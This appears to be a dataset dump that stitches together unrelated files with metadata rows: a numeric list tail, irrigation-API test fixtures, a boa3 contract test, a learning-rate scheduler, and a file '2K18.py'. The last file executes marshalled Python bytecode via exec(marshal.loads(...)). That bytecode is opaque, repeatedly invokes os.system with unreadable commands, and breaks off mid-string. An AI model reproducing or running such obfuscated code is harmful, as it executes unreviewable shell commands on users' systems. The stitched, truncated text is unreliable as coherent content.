313, 313, 202, 311, 2402, 312, 2403, 2413,
313, 314, 314, 314, 214, 311, 2402, 312,
2403, 2413, 313, 2404, 2414, 2423, 314, 315,
315, 315, 315, 226, 311, 2402, 312, 2403,
2413, 313, 2404, 2414, 2423, 314, 2405, 2415,
2424, 2432, 315, 316, 316, 316, 316, 316,
238, 311, 2402, 312, 2403, 2413, 313, 2404,
2414, 2423, 314, 2405, 2415, 2424, 2432, 315,
2406, 2416, 2425, 2433, 2440, 316, 317, 317,
317, 317, 317, 317, 250, 311, 2402, 312,
2403, 2413, 313, 2404, 2414, 2423, 314, 2405,
2415, 2424, 2432, 315, 2406, 2416, 2425, 2433,
2440, 316, 2407, 2417, 2426, 2434, 2441, 2447,
317, 318, 318, 318, 318, 318, 318, 318,
262, 311, 2402, 312, 2403, 2413, 313, 2404,
2414, 2423, 314, 2405, 2415, 2424, 2432, 315,
2406, 2416, 2425, 2433, 2440, 316, 2407, 2417,
2426, 2434, 2441, 2447, 317, 2408, 2418, 2427,
2435, 2442, 2448, 2453, 318, 319, 319, 319,
319, 319, 319, 319, 319, 274, 311, 2402,
312, 2403, 2413, 313, 2404, 2414, 2423, 314,
2405, 2415, 2424, 2432, 315, 2406, 2416, 2425,
2433, 2440, 316, 2407, 2417, 2426, 2434, 2441,
2447, 317, 2408, 2418, 2427, 2435, 2442, 2448,
2453, 318, 2409, 2419, 2428, 2436, 2443, 2449,
2454, 2458, 319, 320, 320, 320, 320, 320,
320, 320, 320, 320, 286, 311, 2402, 312,
2403, 2413, 313, 2404, 2414, 2423, 314, 2405,
2415, 2424, 2432, 315, 2406, 2416, 2425, 2433,
2440, 316, 2407, 2417, 2426, 2434, 2441, 2447,
317, 2408, 2418, 2427, 2435, 2442, 2448, 2453,
318, 2409, 2419, 2428, 2436, 2443, 2449, 2454,
2458, 319, 2410, 2420, 2429, 2437, 2444, 2450,
2455, 2459, 2462, 320, 321, 321, 321, 321,
321, 321, 321, 321, 321, 321, 298, 311,
2402, 312, 2403, 2413, 313, 2404, 2414, 2423,
314, 2405, 2415, 2424, 2432, 315, 2406, 2416,
2425, 2433, 2440, 316, 2407, 2417, 2426, 2434,
2441, 2447, 317, 2408, 2418, 2427, 2435, 2442,
2448, 2453, 318, 2409, 2419, 2428, 2436, 2443,
2449, 2454, 2458, 319, 2410, 2420, 2429, 2437,
2444, 2450, 2455, 2459, 2462, 320, 2411, 2421,
2430, 2438, 2445, 2451, 2456, 2460, 2463, 2465,
321, 322, 322, 322, 322, 322, 322, 322,
322, 322, 322, 322, 310, 155, 155, 156,
155, 156, 157, 155, 156, 157, 158, 155,
156, 157, 158, 159, 155, 156, 157, 158,
159, 160, 155, 156, 157, 158, 159, 160,
161, 155, 156, 157, 158, 159, 160, 161,
162, 155, 156, 157, 158, 159, 160, 161,
162, 163, 155, 156, 157, 158, 159, 160,
161, 162, 163, 164, 155, 156, 157, 158,
159, 160, 161, 162, 163, 164, 165, 155,
156, 157, 158, 159, 160, 161, 162, 163,
164, 165, 166,
]
| 50.440972 | 51 | 0.604108 | 18,403 | 116,216 | 3.814867 | 0.26061 | 0.000855 | 0.001253 | 0.001567 | 0.869212 | 0.857047 | 0.84353 | 0.833901 | 0.826708 | 0.818916 | 0 | 0.791958 | 0.237523 | 116,216 | 2,303 | 52 | 50.462875 | 0.000316 | 0.000224 | 0 | 0.147698 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
43423da53aa44f533384081c1276ecbe26fcd6bc | 4,755 | py | Python | tests/fixtures/zone.py | peterg79/regenmaschine | 3b76fb42c34d6d655d8e793bca4cfcf21c858123 | [
"MIT"
] | null | null | null | tests/fixtures/zone.py | peterg79/regenmaschine | 3b76fb42c34d6d655d8e793bca4cfcf21c858123 | [
"MIT"
] | null | null | null | tests/fixtures/zone.py | peterg79/regenmaschine | 3b76fb42c34d6d655d8e793bca4cfcf21c858123 | [
"MIT"
] | null | null | null | """Define fixtures related to the "zone" endpoint."""
import pytest
@pytest.fixture()
def zone_id_properties_json():
"""Return a /zone/<ID>/properties response."""
return {
"uid": 1,
"name": "Landscaping",
"valveid": 1,
"ETcoef": 0.80000000000000004,
"active": True,
"type": 4,
"internet": True,
"savings": 100,
"slope": 1,
"sun": 1,
"soil": 5,
"group_id": 4,
"history": True,
"master": False,
"before": 0,
"after": 0,
"waterSense": {
"fieldCapacity": 0.17000000000000001,
"rootDepth": 229,
"minRuntime": -1,
"appEfficiency": 0.75,
"isTallPlant": True,
"permWilting": 0.029999999999999999,
"allowedSurfaceAcc": 8.3800000000000008,
"maxAllowedDepletion": 0.5,
"precipitationRate": 25.399999999999999,
"currentFieldCapacity": 16.030000000000001,
"area": 92.900001525878906,
"referenceTime": 1243,
"detailedMonthsKc": [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
"flowrate": None,
"soilIntakeRate": 10.16,
},
"customSoilPreset": None,
"customVegetationPreset": None,
"customSprinklerPreset": None,
}
@pytest.fixture()
def zone_post_json():
"""Return a /zone (POST) response."""
return {"statusCode": 0, "message": "OK"}
@pytest.fixture()
def zone_properties_json():
"""Return a /zone/properties response."""
return {
"zones": [
{
"uid": 1,
"name": "Landscaping",
"valveid": 1,
"ETcoef": 0.80000000000000004,
"active": True,
"type": 4,
"internet": True,
"savings": 100,
"slope": 1,
"sun": 1,
"soil": 5,
"group_id": 4,
"history": True,
"master": False,
"before": 0,
"after": 0,
"waterSense": {
"fieldCapacity": 0.17000000000000001,
"rootDepth": 229,
"minRuntime": -1,
"appEfficiency": 0.75,
"isTallPlant": True,
"permWilting": 0.029999999999999999,
"allowedSurfaceAcc": 8.3800000000000008,
"maxAllowedDepletion": 0.5,
"precipitationRate": 25.399999999999999,
"currentFieldCapacity": 16.030000000000001,
"area": 92.900001525878906,
"referenceTime": 1243,
"detailedMonthsKc": [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
"flowrate": None,
"soilIntakeRate": 10.16,
},
"customSoilPreset": None,
"customVegetationPreset": None,
"customSprinklerPreset": None,
},
{
"uid": 2,
"name": "Flower Bed",
"valveid": 1,
"ETcoef": 0.80000000000000004,
"active": False,
"type": 4,
"internet": True,
"savings": 100,
"slope": 1,
"sun": 1,
"soil": 5,
"group_id": 4,
"history": True,
"master": False,
"before": 0,
"after": 0,
"waterSense": {
"fieldCapacity": 0.17000000000000001,
"rootDepth": 229,
"minRuntime": -1,
"appEfficiency": 0.75,
"isTallPlant": True,
"permWilting": 0.029999999999999999,
"allowedSurfaceAcc": 8.3800000000000008,
"maxAllowedDepletion": 0.5,
"precipitationRate": 25.399999999999999,
"currentFieldCapacity": 16.030000000000001,
"area": 92.900001525878906,
"referenceTime": 1243,
"detailedMonthsKc": [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
"flowrate": None,
"soilIntakeRate": 10.16,
},
"customSoilPreset": None,
"customVegetationPreset": None,
"customSprinklerPreset": None,
},
]
}
@pytest.fixture()
def zone_start_stop_json():
"""Return a response for /zone/<ID>/start and /zone/<ID>/stop."""
return {"statusCode": 0, "message": "OK"}
| 33.251748 | 81 | 0.439327 | 359 | 4,755 | 5.78273 | 0.245125 | 0.022158 | 0.028902 | 0.038536 | 0.877168 | 0.828035 | 0.80973 | 0.80973 | 0.80973 | 0.80973 | 0 | 0.184954 | 0.426919 | 4,755 | 142 | 82 | 33.485915 | 0.576881 | 0.045426 | 0 | 0.844961 | 0 | 0 | 0.251274 | 0.028584 | 0 | 0 | 0 | 0 | 0 | 1 | 0.031008 | true | 0 | 0.007752 | 0 | 0.069767 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
4a51b045b2c6f93644043a330d6b89999a19b3ba | 155 | py | Python | boa3_test/test_sc/interop_test/runtime/CallingScriptHash.py | hal0x2328/neo3-boa | 6825a3533384cb01660773050719402a9703065b | [
"Apache-2.0"
] | 25 | 2020-07-22T19:37:43.000Z | 2022-03-08T03:23:55.000Z | boa3_test/test_sc/interop_test/runtime/CallingScriptHash.py | hal0x2328/neo3-boa | 6825a3533384cb01660773050719402a9703065b | [
"Apache-2.0"
] | 419 | 2020-04-23T17:48:14.000Z | 2022-03-31T13:17:45.000Z | boa3_test/test_sc/interop_test/runtime/CallingScriptHash.py | hal0x2328/neo3-boa | 6825a3533384cb01660773050719402a9703065b | [
"Apache-2.0"
] | 15 | 2020-05-21T21:54:24.000Z | 2021-11-18T06:17:24.000Z | from boa3.builtin.interop.runtime import calling_script_hash
from boa3.builtin.type import UInt160
def Main() -> UInt160:
return calling_script_hash
| 22.142857 | 60 | 0.806452 | 22 | 155 | 5.5 | 0.636364 | 0.132231 | 0.247934 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.059259 | 0.129032 | 155 | 6 | 61 | 25.833333 | 0.837037 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
4396b65d0afeba59d9fd6311235008de268a0946 | 712 | py | Python | openks/models/pytorch/mmd_modules/spcan/utils/lr_scheduler.py | vivym/OpenKS | ea380782162de2e4c1a413f37ad12b85ccb7048a | [
"Apache-2.0"
] | null | null | null | openks/models/pytorch/mmd_modules/spcan/utils/lr_scheduler.py | vivym/OpenKS | ea380782162de2e4c1a413f37ad12b85ccb7048a | [
"Apache-2.0"
] | null | null | null | openks/models/pytorch/mmd_modules/spcan/utils/lr_scheduler.py | vivym/OpenKS | ea380782162de2e4c1a413f37ad12b85ccb7048a | [
"Apache-2.0"
] | 2 | 2021-11-18T06:55:55.000Z | 2021-12-29T15:21:07.000Z | # Learning rate scheduler
def lr_scheduler(optimizer, lr_mult, args, weight_mult=1, ):
counter = 0
for param_group in optimizer.param_groups:
if counter == 0:
optimizer.param_groups[counter]['lr'] = args.base_lr * lr_mult / 10.0
else:
optimizer.param_groups[counter]['lr'] = args.base_lr * lr_mult
counter += 1
return optimizer, lr_mult
def dom_w_scheduler(optimizer, lr_mult, args, weight_mult=1):
counter = 0
for param_group in optimizer.param_groups:
if counter == 0:
optimizer.param_groups[counter]['lr'] = args.base_lr * lr_mult * weight_mult
counter += 1
return optimizer, lr_mult
| 32.363636 | 89 | 0.632022 | 95 | 712 | 4.494737 | 0.252632 | 0.098361 | 0.234192 | 0.189696 | 0.892272 | 0.892272 | 0.892272 | 0.747073 | 0.747073 | 0.747073 | 0 | 0.021236 | 0.272472 | 712 | 21 | 90 | 33.904762 | 0.803089 | 0.032303 | 0 | 0.625 | 0 | 0 | 0.009009 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
43c64356544306942d0020aa187340d0879b2b3a | 47,345 | py | Python | 2K18.py | Xeit666h05t/2K18 | 0a07f4652c6f54191a16c5e395db6dfd31eca86d | [
"Apache-2.0"
] | null | null | null | 2K18.py | Xeit666h05t/2K18 | 0a07f4652c6f54191a16c5e395db6dfd31eca86d | [
"Apache-2.0"
] | null | null | null | 2K18.py | Xeit666h05t/2K18 | 0a07f4652c6f54191a16c5e395db6dfd31eca86d | [
"Apache-2.0"
] | null | null | null |
import marshal
exec(marshal.loads('''c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s\x1f\x1e\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00d\x00\x00d\x01\x00l\x04\x00Z\x04\x00d\x02\x00\x84\x00\x00Z\x05\x00d\x03\x00\x84\x00\x00Z\x06\x00e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01d\x05\x00Z\x08\x00d\x06\x00Z\t\x00d\x07\x00Z\n\x00d\x08\x00Z\x0b\x00d\t\x00Z\x0c\x00d\n\x00Z\r\x00d\x0b\x00Z\x0e\x00d\x0c\x00Z\x0f\x00d\r\x00Z\x10\x00d\x0e\x00Z\x11\x00d\x0f\x00Z\x12\x00e\x05\x00e\x0b\x00d\x10\x00\x17\x83\x01\x00\x01e\x13\x00e\x0e\x00d\x11\x00\x17\x83\x01\x00Z\x14\x00d\x12\x00GHd\x13\x00GHd\x14\x00GHd\x15\x00GHd\x16\x00GHd\x17\x00GHd\x18\x00GHd\x19\x00GHd\x1a\x00GHd\x1b\x00GHd\x1c\x00GHd\x1d\x00GHd\x1e\x00GHd\x1f\x00GHd \x00GHd!\x00GHd"\x00GHd#\x00GHd$\x00GHd%\x00GHd&\x00GHd\'\x00GHd(\x00GHd)\x00GHd*\x00GHd+\x00GHd,\x00GHd-\x00GHd.\x00GHd/\x00GHd0\x00GHd1\x00GHd2\x00GHd3\x00GHd4\x00GHd5\x00GHd6\x00GHd7\x00GHd8\x00GHd9\x00GHd:\x00GHd;\x00GHd<\x00GHd=\x00GHd>\x00GHd?\x00GHd@\x00GHdA\x00GHdB\x00GHdC\x00GHdD\x00GHdE\x00GHdF\x00GHdG\x00GHdH\x00GHdI\x00GHdJ\x00GHdK\x00GHdL\x00GHdM\x00GHdN\x00GHdO\x00GHdP\x00GHdQ\x00GHdR\x00GHdS\x00GHdT\x00GHdU\x00GHdV\x00GHdW\x00GHdX\x00GHe\x13\x00e\r\x00d\x11\x00\x17\x83\x01\x00Z\x14\x00e\x14\x00dY\x00k\x02\x00sF\x02e\x14\x00dZ\x00k\x02\x00r\xa1\x02d[\x00GHe\x00\x00j\x07\x00d\\\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d]\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d^\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d_\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d`\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00db\x00k\x02\x00s\xb9\x02e\x14\x00dc\x00k\x02\x00r!\x03dd\x00GHe\x00\x00j\x07\x00de\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d]\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\\\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d_\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d^\x00\x83\x01\x00\x01e\x00\x00j\x07\x00df\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x0
0\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00dg\x00k\x02\x00s9\x03e\x14\x00dh\x00k\x02\x00r\x87\x03di\x00GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dk\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dl\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dm\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00dn\x00k\x02\x00s\x9f\x03e\x14\x00do\x00k\x02\x00r\xfa\x03dp\x00GHe\x00\x00j\x07\x00d\\\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d_\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d^\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dq\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dr\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00ds\x00k\x02\x00s\x12\x04e\x14\x00dt\x00k\x02\x00r\xa1\x04du\x00GHe\x00\x00j\x07\x00de\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d]\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\\\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d_\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dv\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d^\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dw\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dx\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dy\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00dz\x00k\x02\x00s\xb9\x04e\x14\x00d{\x00k\x02\x00rb\x05d|\x00GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d}\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d~\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x7f\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x80\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x81\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x82\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x83\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x84\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x85\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x86\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x87\x00k\x02\x00sz\x05e\x14\x00d\x88\x00k\x02\x00r\xe2\x05d\x89\x00GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dl\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dw\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x8a\x00\x83\x01\x00\x01e\x00\x
00j\x07\x00d\x8b\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x8c\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x8d\x00k\x02\x00s\xfa\x05e\x14\x00d\x8e\x00k\x02\x00rb\x06d\x8f\x00GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dl\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x90\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x91\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x92\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x93\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x94\x00k\x02\x00sz\x06e\x14\x00d\x94\x00k\x02\x00r\xe2\x06d\x95\x00GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dl\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dq\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x96\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x97\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x98\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x99\x00k\x02\x00s\xfa\x06e\x14\x00d\x99\x00k\x02\x00rH\x07d\x9a\x00GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x9b\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x9c\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x9d\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x9e\x00k\x02\x00s`\x07e\x14\x00d\x9e\x00k\x02\x00r\xae\x07d\x9f\x00GHe\x00\x00j\x07\x00d\xa0\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xa1\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xa2\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x86\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xa3\x00k\x02\x00s\xc6\x07e\x14\x00d\xa4\x00k\x02\x00r\x14\x08d\xa5\x00GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xa6\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xa7\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x86\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xa4\x00k\x02\x00s,\x08e\x14\x00d\xa4\x00k\x02\x00r\xae\x08d\xa8\x00GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dw\x00\x8
3\x01\x00\x01e\x00\x00j\x07\x00d\xa9\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xaa\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xab\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xac\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xad\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x86\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xae\x00k\x02\x00s\xc6\x08e\x14\x00d\xae\x00k\x02\x00r.\td\xaf\x00GHe\x00\x00j\x07\x00d\xb0\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xa6\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dl\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xb1\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xb2\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xb3\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xb4\x00k\x02\x00sF\te\x14\x00d\xb4\x00k\x02\x00r\xa1\td\xb5\x00GHe\x00\x00j\x07\x00d\xb6\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x9c\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xb7\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xb8\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xb9\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xba\x00k\x02\x00s\xb9\te\x14\x00d\xba\x00k\x02\x00r\xed\td\xbb\x00GHe\x00\x00j\x07\x00d\xb6\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xbc\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xbd\x00k\x02\x00s\x05\ne\x14\x00d\xbd\x00k\x02\x00rS\nd\xbe\x00GHe\x00\x00j\x07\x00d\xb6\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x9c\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xbf\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xc0\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xc1\x00k\x02\x00sk\ne\x14\x00d\xc1\x00k\x02\x00r\xb9\nd\xc2\x00GHe\x00\x00j\x07\x00d\xb6\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d^\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x9c\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xc3\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xc4\x00k\x02\x00s\xd1\ne\x14\x00d\xc4\x00k\x02\x00rF\x0bd\xc5\x00GHe\x00\x00
j\x07\x00d\xb6\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x9c\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xa6\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xc6\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xc7\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xc8\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xc9\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xca\x00k\x02\x00s^\x0be\x14\x00d\xca\x00k\x02\x00r\xd3\x0bd\xcb\x00GHe\x00\x00j\x07\x00dl\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xa6\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xcc\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xcd\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xce\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xc9\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xcf\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xd0\x00k\x02\x00rY\x0cd\xd1\x00GHe\x00\x00j\x07\x00dl\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xd2\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xd3\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xd4\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xd5\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xd4\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xd6\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01d\xd7\x00GHda\x00GHn\x00\x00e\x14\x00d\xd8\x00k\x02\x00r\xc0\x0cd\xd9\x00GHe\x00\x00j\x07\x00d\xb0\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xda\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d_\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dq\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xdb\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xdc\x00k\x02\x00r\'\rd\xdd\x00GHe\x00\x00j\x07\x00d\xb0\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xda\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d_\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dq\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xde\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xdf\x00k\x02\x00r\x9b\rd\xe0\x00GHe\x00\x00j\x07\x00d}\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dl\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xe1\x00\x83\x01\x00\x01e
\x00\x00j\x07\x00d\xe2\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xe3\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xe4\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xe5\x00k\x02\x00r\xf5\rd\xe6\x00GHe\x00\x00j\x07\x00d_\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xe7\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xe8\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xe9\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xea\x00k\x02\x00rO\x0ed\xeb\x00GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xec\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xed\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xee\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xef\x00k\x02\x00r\xb1\x0ed\xf0\x00GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xf1\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xf2\x00\x83\x01\x00\x01e\x00\x00j\x07\x